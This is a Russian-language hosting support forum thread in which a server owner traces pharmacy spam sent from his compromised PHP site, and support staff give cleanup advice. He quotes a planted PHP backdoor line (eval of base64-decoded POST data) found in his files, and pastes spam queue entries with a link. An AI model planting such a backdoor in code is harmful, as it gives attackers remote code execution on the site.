php mail header

Все о скриптах

Модераторы: Art.i, vasya

php mail header

Сообщение WolfHunter » Ср янв 28, 2015 12:48 pm

Люди добрые!
Помогите пожалуйста поставить патч php mail header.
Centos-6-amd64-ispmgr5


mail.add_x_header = On
mail.log = "/var/tmp/php.mail.log"
не помогает

P.S. в очереди есть письма без заголовков:

1YFtND-0003tF-Cr-D

<p><h1>Your Liable Medicines Supplies save time and money - <a href="http://lorettacella.com/wp-includes/js/tinymce/themes/advanced/skins/config.html">visit our site</a></h1></p>


а есть вот такая хрень:
1YFrAf-0006W4-RF-H
sashka 502 502
<elena_larson@rdv-spb.ru>
1422307569 0
-ident sashka
-received_protocol local
-aclc 9 12
elena_larson
-aclc 8 0

-body_linecount 3
-max_received_linelength 182
-allow_unqualified_recipient
-allow_unqualified_sender
XX
1
andiaka_ferry@rocketmail.com

198P Received: from sashka by wolfhunter.fvds.ru with local (Exim 4.72)
(envelope-from <elena_larson@rdv-spb.ru>)
id 1YFrAf-0006W4-RF
for andiaka_ferry@rocketmail.com; Tue, 27 Jan 2015 01:26:09 +0400
038 Date: Tue, 27 Jan 2015 01:26:09 +0400
051I Message-Id: <E1YFrAf-0006W4-RF@wolfhunter.fvds.ru>
033T To: andiaka_ferry@rocketmail.com
037 Subject: Fw: Superb Pharma Products
042 X-PHP-Originating-Script: 502:include.php
047F From: "Elena Larson" <elena_larson@rdv-spb.ru>
050R Reply-To:"Elena Larson" <elena_larson@rdv-spb.ru>
023 X-Priority: 3 (Normal)
018 MIME-Version: 1.0
046 Content-Type: text/html; charset="iso-8859-1"
032 Content-Transfer-Encoding: 8bit
WolfHunter
 
Сообщений: 23
Зарегистрирован: Чт окт 24, 2013 2:50 pm

Re: php mail header

Сообщение ls » Ср янв 28, 2015 2:29 pm

Вам надо пересобрать PHP с этим модулем, вообще насколько вижу модуль есть, только не работает

X-PHP-Originating-Script: 502:include.php

ищите все скрипты include.php на сайте
* FirstVDS в twitter в facebook и в вконтакте *
ls
Support team
 
Сообщений: 6388
Зарегистрирован: Чт мар 01, 2007 10:36 am
Откуда: FirstVDS

Re: php mail header

Сообщение WolfHunter » Ср янв 28, 2015 2:44 pm

какой-то нехороший тип, понатыкал в файлах:
eval(base64_decode($_POST['nfd5793']));

умучился тереть
WolfHunter
 
Сообщений: 23
Зарегистрирован: Чт окт 24, 2013 2:50 pm

Re: php mail header

Сообщение pepper » Ср янв 28, 2015 3:20 pm

Совет: При нахождении подобных включений в код стоит посмотреть даты изменения файлов командой stat, перед тем, как исправлять код.
Это может помочь в поиске уязвимости, через которую поменяли ваш код.
Потом время Modify (или Change) из вывода stat стоит проверить на наличие в журналах доступа к сайтам и журналов ftp (xferlog).
pepper
Support team
 
Сообщений: 551
Зарегистрирован: Пн окт 07, 2013 4:06 am

Re: php mail header

Сообщение WolfHunter » Ср янв 28, 2015 3:33 pm

изменения были летом. так что с логами проблема
WolfHunter
 
Сообщений: 23
Зарегистрирован: Чт окт 24, 2013 2:50 pm

Re: php mail header

Сообщение pepper » Ср янв 28, 2015 3:42 pm

Если бэкапы восстановить на время до заражения не вариант, тогда вычищайте код, ставьте правильные права на директории/файлы и проверяйте скриптами периодически на наличие вредоносных включений /изменения в файлах.
pepper
Support team
 
Сообщений: 551
Зарегистрирован: Пн окт 07, 2013 4:06 am

Re: php mail header

Сообщение ls » Ср янв 28, 2015 6:01 pm

> mail.add_x_header = On
> mail.log = "/var/tmp/php.mail.log"

А вы где это прописываете?
Я проверил - все работает на данном шаблоне если скрипт шлет функцией mail - mail ("user@example.com","subj","text");
Добавил в /etc/php.ini и перезапустил apache командой apachectl restart - файл создался и пишется в него отправка каким скриптом и куда отправлено
* FirstVDS в twitter в facebook и в вконтакте *
ls
Support team
 
Сообщений: 6388
Зарегистрирован: Чт мар 01, 2007 10:36 am
Откуда: FirstVDS

Re: php mail header

Сообщение WolfHunter » Ср янв 28, 2015 7:21 pm

извините что ввел в заблуждение. я имел ввиду что по логам не найти зловредные включения в файлы. Получается что они не используют mail(). А что тогда? спам то идёт! smtp? :-о
WolfHunter
 
Сообщений: 23
Зарегистрирован: Чт окт 24, 2013 2:50 pm

Re: php mail header

Сообщение pepper » Ср янв 28, 2015 7:41 pm

>> я имел ввиду что по логам не найти зловредные включения в файлы
По логам вы могли найти путь взлома и заливки файлов.
Включения зловредные ищутся скриптами, grep-ом и после вручную.

Во-первых, остановите почтовый сервер, чтоб не компрометировать дальше свой IP, во-вторых, очистите почтовую очередь, чтобы исключить старый спам.
Теперь можно включить почтовик и понаблюдать за его журналами.
Если спам всё же есть, снова остановите почтовик и ищите включения скриптами.

Если сами не справитесь, - первый раз очистка при купленном "Администрировании" проводится за 1 инцидент.
pepper
Support team
 
Сообщений: 551
Зарегистрирован: Пн окт 07, 2013 4:06 am

Re: php mail header

Сообщение WolfHunter » Ср янв 28, 2015 8:42 pm

по логам(/var/tmp/php.mail.log) последнее письмо отправлено 23 января(бот слал через стандартную форму joomla), хотя спам льётся каждый день.

За совет спасибо! Сейчас всё проверяю ai-bolit`ом
включений хоть жопой ешь(извините). меняю все пароли
WolfHunter
 
Сообщений: 23
Зарегистрирован: Чт окт 24, 2013 2:50 pm

Re: php mail header

Сообщение ls » Чт янв 29, 2015 4:00 am

* FirstVDS в twitter в facebook и в вконтакте *
ls
Support team
 
Сообщений: 6388
Зарегистрирован: Чт мар 01, 2007 10:36 am
Откуда: FirstVDS


Вернуться в CGI, Perl, PHP

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2